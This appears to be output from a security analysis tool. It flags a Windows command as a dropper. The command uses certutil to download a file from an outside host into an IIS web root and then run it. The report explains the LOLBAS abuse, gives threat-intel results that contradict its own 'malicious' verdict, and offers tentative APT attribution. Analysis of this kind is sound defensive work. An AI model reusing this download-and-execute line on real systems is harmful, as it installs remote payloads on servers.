Malicious — high-confidence attack behavior
Attack signal: Dropper.
cmd.exe /c cd /d "C:\inetpub\wwwroot\aspnet_client\" & certutil.exe -urlcache -split -f hxxp://p.estonine[.]com/p & p
Uses the Windows Command Prompt to execute an inline command chain: it changes into the web root directory (`C:\inetpub\wwwroot\aspnet_client\`), then uses the Windows certificate utility (`certutil.exe -urlcache -split -f`) to download a file via the URL cache from `p.estonine.com`, and finally invokes the downloaded file `p`.
The command leverages Cmd.exe and Certutil.exe, a set of Windows binaries catalogued in LOLBAS as commonly abused for living-off-the-land attacks — known abuse categories: Encode, Decode, and Download.
1 network indicator was extracted (0 IPs, 1 URL); it returned no hits across queried threat intelligence sources.
The combination of high-confidence threat behavior, known-abused binary usage, and payload obfuscation strongly suggests this is an active attack payload. Treat this command as malicious and initiate containment procedures.
All indicators appear clean across queried sources.
unexpected EOF while looking for matching '"' (position 117)
This tool uses a Linux bash parser (bashlex). Windows commands, PowerShell, and embedded scripts are expected to fail shell parsing — analysis above is not affected.
Russian SVR threat group responsible for the SolarWinds supply chain attack and numerous government breaches. Known for stealthy, long-dwell intrusions.
Vietnamese state-sponsored group targeting foreign corporations, governments, and journalists with access to political, economic, and corporate secrets.
Sophisticated financially motivated group targeting the hospitality, restaurant, and retail industries. Known for spear-phishing with malicious documents and point-of-sale malware.
Russian GRU Unit 26165 threat group active since at least 2004. Primarily targets governments, militaries, and security organizations.
Attribution based on MITRE ATT&CK technique overlap. Confidence reflects TTP match depth — not a definitive attribution.